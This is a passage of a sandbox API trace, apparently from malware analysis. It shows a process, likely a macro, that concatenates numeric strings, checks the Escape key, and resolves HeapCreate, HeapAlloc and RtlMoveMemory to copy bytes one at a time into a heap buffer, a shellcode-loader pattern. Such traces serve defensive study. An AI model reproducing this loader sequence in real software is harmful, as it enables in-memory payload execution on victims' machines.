pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="106", bstrRight="58206", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="40", bstrRight="555403", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="89", bstrRight="865696", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.923] VarBstrCat (in: bstrLeft="66", bstrRight="829952", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.924] VarBstrCat (in: bstrLeft="55", bstrRight="202759", pbstrResult=0x18a2f8 | out: pbstrResult=0x18a2f8) returned 0x0 [0104.924] VarBstrCat (in: bstrLeft="80", bstrRight="268233", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.924] VarBstrCat (in: bstrLeft="105", bstrRight="215841", pbstrResult=0x18a2f4 | out: pbstrResult=0x18a2f4) returned 0x0 [0104.924] GetAsyncKeyState (vKey=27) returned 0 [0104.924] VarBstrFromI4 (in: lIn=16498539, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2d0 | out: pbstrOut=0x18a2d0*="16498539") returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="59", bstrRight="238125", pbstrResult=0x18a2b8 | out: pbstrResult=0x18a2b8) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="1241", bstrRight="475990", pbstrResult=0x18a2cc | out: pbstrResult=0x18a2cc) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="132", bstrRight="449991", pbstrResult=0x18a2bc | out: pbstrResult=0x18a2bc) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="15", bstrRight="546924", pbstrResult=0x18a2b8 | out: pbstrResult=0x18a2b8) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="31", bstrRight="461245", pbstrResult=0x18a2c4 | out: pbstrResult=0x18a2c4) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="130", bstrRight="484512", pbstrResult=0x18a2bc | out: pbstrResult=0x18a2bc) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="45", bstrRight="725360", pbstrResult=0x18a2c4 | out: pbstrResult=0x18a2c4) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="192", bstrRight="246195", pbstrResult=0x18a2b8 | out: pbstrResult=0x18a2b8) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="71", bstrRight="598427", pbstrResult=0x18a2c4 | out: pbstrResult=0x18a2c4) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="183", bstrRight="419468", pbstrResult=0x18a2bc | out: pbstrResult=0x18a2bc) returned 0x0 [0104.925] GetAsyncKeyState (vKey=27) returned 0 [0104.925] VarBstrFromI4 (in: lIn=13565180, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a2fc | out: pbstrOut=0x18a2fc*="13565180") returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="135", bstrRight="302255", pbstrResult=0x18a2d4 | out: pbstrResult=0x18a2d4) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="11", bstrRight="90695", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="56", bstrRight="619497", pbstrResult=0x18a2d4 | out: pbstrResult=0x18a2d4) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="25", bstrRight="722098", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="56", bstrRight="560273", pbstrResult=0x18a2d0 | out: pbstrResult=0x18a2d0) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="51", bstrRight="718902", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="54", bstrRight="135962", pbstrResult=0x18a2d4 | out: pbstrResult=0x18a2d4) returned 0x0 [0104.925] VarBstrCat (in: bstrLeft="65", bstrRight="479709", pbstrResult=0x18a2dc | out: pbstrResult=0x18a2dc) returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="190", bstrRight="452550", pbstrResult=0x18a2d0 | out: pbstrResult=0x18a2d0) returned 0x0 [0104.926] GetAsyncKeyState (vKey=27) returned 0 [0104.926] VarBstrFromI4 (in: lIn=14032512, lcid=0x409, dwFlags=0x0, pbstrOut=0x18a32c | out: pbstrOut=0x18a32c*="14032512") returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="8", bstrRight="209959", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="119", bstrRight="925627", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="34", bstrRight="180445", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="218", bstrRight="974448", pbstrResult=0x18a304 | out: pbstrResult=0x18a304) returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="48", bstrRight="235056", pbstrResult=0x18a30c | out: pbstrResult=0x18a30c) returned 0x0 [0104.926] VarBstrCat (in: bstrLeft="218", bstrRight="685799", pbstrResult=0x18a300 | out: pbstrResult=0x18a300) returned 0x0 [0104.927] GetProcAddress (hModule=0x76df0000, lpProcName="HeapCreate") returned 0x76e04a2d [0104.928] GetLastError () returned 0x0 [0104.929] GetProcAddress (hModule=0x76df0000, lpProcName="HeapAlloc") returned 0x77b8e026 [0104.929] GetLastError () returned 0x0 [0104.930] GetProcAddress (hModule=0x76df0000, lpProcName="RtlMoveMemory") returned 0x77bc3c40 [0104.930] RtlMoveMemory (in: Destination=0x5c80578, Source=0x18a590, Length=0x1 | out: Destination=0x5c80578) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80579, Source=0x18a590, Length=0x1 | out: Destination=0x5c80579) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8057a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8057a) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8057b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8057b) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8057c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8057c) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8057d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8057d) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8057e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8057e) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8057f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8057f) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80580, Source=0x18a590, Length=0x1 | out: Destination=0x5c80580) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80581, Source=0x18a590, Length=0x1 | out: Destination=0x5c80581) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80582, Source=0x18a590, Length=0x1 | out: Destination=0x5c80582) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80583, Source=0x18a590, Length=0x1 | out: Destination=0x5c80583) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80584, Source=0x18a590, Length=0x1 | out: Destination=0x5c80584) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80585, Source=0x18a590, Length=0x1 | out: Destination=0x5c80585) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80586, Source=0x18a590, Length=0x1 | out: Destination=0x5c80586) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80587, Source=0x18a590, Length=0x1 | out: Destination=0x5c80587) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80588, Source=0x18a590, Length=0x1 | out: Destination=0x5c80588) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c80589, Source=0x18a590, Length=0x1 | out: Destination=0x5c80589) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8058a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8058a) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8058b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8058b) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8058c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8058c) [0104.930] GetLastError () returned 0x0 [0104.930] RtlMoveMemory (in: Destination=0x5c8058d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8058d) [0104.930] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8058e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8058e) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8058f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8058f) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80590, Source=0x18a590, Length=0x1 | out: Destination=0x5c80590) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80591, Source=0x18a590, Length=0x1 | out: Destination=0x5c80591) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80592, Source=0x18a590, Length=0x1 | out: Destination=0x5c80592) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80593, Source=0x18a590, Length=0x1 | out: Destination=0x5c80593) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80594, Source=0x18a590, Length=0x1 | out: Destination=0x5c80594) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80595, Source=0x18a590, Length=0x1 | out: Destination=0x5c80595) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80596, Source=0x18a590, Length=0x1 | out: Destination=0x5c80596) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80597, Source=0x18a590, Length=0x1 | out: Destination=0x5c80597) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80598, Source=0x18a590, Length=0x1 | out: Destination=0x5c80598) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c80599, Source=0x18a590, Length=0x1 | out: Destination=0x5c80599) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8059a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8059a) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8059b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8059b) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8059c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8059c) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8059d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8059d) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8059e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8059e) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c8059f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8059f) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a0, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a0) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a1, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a1) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a2, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a2) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a3, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a3) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a4, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a4) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a5, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a5) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a6, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a6) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a7, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a7) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a8, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a8) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805a9, Source=0x18a590, Length=0x1 | out: Destination=0x5c805a9) [0104.931] GetLastError () returned 0x0 [0104.931] RtlMoveMemory (in: Destination=0x5c805aa, Source=0x18a590, Length=0x1 | out: Destination=0x5c805aa) [0104.931] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805ab, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ab) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805ac, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ac) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805ad, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ad) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805ae, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ae) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805af, Source=0x18a590, Length=0x1 | out: Destination=0x5c805af) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b0, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b0) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b1, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b1) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b2, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b2) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b3, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b3) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b4, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b4) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b5, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b5) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b6, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b6) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b7, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b7) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b8, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b8) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805b9, Source=0x18a590, Length=0x1 | out: Destination=0x5c805b9) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805ba, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ba) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805bb, Source=0x18a590, Length=0x1 | out: Destination=0x5c805bb) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805bc, Source=0x18a590, Length=0x1 | out: Destination=0x5c805bc) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805bd, Source=0x18a590, Length=0x1 | out: Destination=0x5c805bd) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805be, Source=0x18a590, Length=0x1 | out: Destination=0x5c805be) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805bf, Source=0x18a590, Length=0x1 | out: Destination=0x5c805bf) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c0, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c0) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c1, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c1) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c2, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c2) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c3, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c3) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c4, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c4) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c5, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c5) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c6, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c6) [0104.932] GetLastError () returned 0x0 [0104.932] RtlMoveMemory (in: Destination=0x5c805c7, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c7) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805c8, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c8) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805c9, Source=0x18a590, Length=0x1 | out: Destination=0x5c805c9) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805ca, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ca) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805cb, Source=0x18a590, Length=0x1 | out: Destination=0x5c805cb) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805cc, Source=0x18a590, Length=0x1 | out: Destination=0x5c805cc) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805cd, Source=0x18a590, Length=0x1 | out: Destination=0x5c805cd) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805ce, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ce) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805cf, Source=0x18a590, Length=0x1 | out: Destination=0x5c805cf) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d0, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d0) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d1, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d1) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d2, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d2) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d3, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d3) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d4, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d4) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d5, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d5) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d6, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d6) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d7, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d7) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d8, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d8) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805d9, Source=0x18a590, Length=0x1 | out: Destination=0x5c805d9) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805da, Source=0x18a590, Length=0x1 | out: Destination=0x5c805da) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805db, Source=0x18a590, Length=0x1 | out: Destination=0x5c805db) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805dc, Source=0x18a590, Length=0x1 | out: Destination=0x5c805dc) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805dd, Source=0x18a590, Length=0x1 | out: Destination=0x5c805dd) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805de, Source=0x18a590, Length=0x1 | out: Destination=0x5c805de) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805df, Source=0x18a590, Length=0x1 | out: Destination=0x5c805df) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805e0, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e0) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805e1, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e1) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805e2, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e2) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805e3, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e3) [0104.933] GetLastError () returned 0x0 [0104.933] RtlMoveMemory (in: Destination=0x5c805e4, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e4) [0104.933] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805e5, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e5) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805e6, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e6) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805e7, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e7) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805e8, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e8) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805e9, Source=0x18a590, Length=0x1 | out: Destination=0x5c805e9) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805ea, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ea) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805eb, Source=0x18a590, Length=0x1 | out: Destination=0x5c805eb) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805ec, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ec) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805ed, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ed) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805ee, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ee) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805ef, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ef) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f0, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f0) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f1, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f1) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f2, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f2) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f3, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f3) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f4, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f4) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f5, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f5) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f6, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f6) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f7, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f7) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f8, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f8) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805f9, Source=0x18a590, Length=0x1 | out: Destination=0x5c805f9) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805fa, Source=0x18a590, Length=0x1 | out: Destination=0x5c805fa) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805fb, Source=0x18a590, Length=0x1 | out: Destination=0x5c805fb) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805fc, Source=0x18a590, Length=0x1 | out: Destination=0x5c805fc) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805fd, Source=0x18a590, Length=0x1 | out: Destination=0x5c805fd) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805fe, Source=0x18a590, Length=0x1 | out: Destination=0x5c805fe) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c805ff, Source=0x18a590, Length=0x1 | out: Destination=0x5c805ff) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c80600, Source=0x18a590, Length=0x1 | out: Destination=0x5c80600) [0104.934] GetLastError () returned 0x0 [0104.934] RtlMoveMemory (in: Destination=0x5c80601, Source=0x18a590, Length=0x1 | out: Destination=0x5c80601) [0104.934] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80602, Source=0x18a590, Length=0x1 | out: Destination=0x5c80602) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80603, Source=0x18a590, Length=0x1 | out: Destination=0x5c80603) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80604, Source=0x18a590, Length=0x1 | out: Destination=0x5c80604) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80605, Source=0x18a590, Length=0x1 | out: Destination=0x5c80605) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80606, Source=0x18a590, Length=0x1 | out: Destination=0x5c80606) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80607, Source=0x18a590, Length=0x1 | out: Destination=0x5c80607) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80608, Source=0x18a590, Length=0x1 | out: Destination=0x5c80608) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80609, Source=0x18a590, Length=0x1 | out: Destination=0x5c80609) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8060a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8060a) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8060b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8060b) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8060c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8060c) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8060d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8060d) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8060e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8060e) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8060f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8060f) [0104.935] GetLastError () returned 0x0 [0104.935] 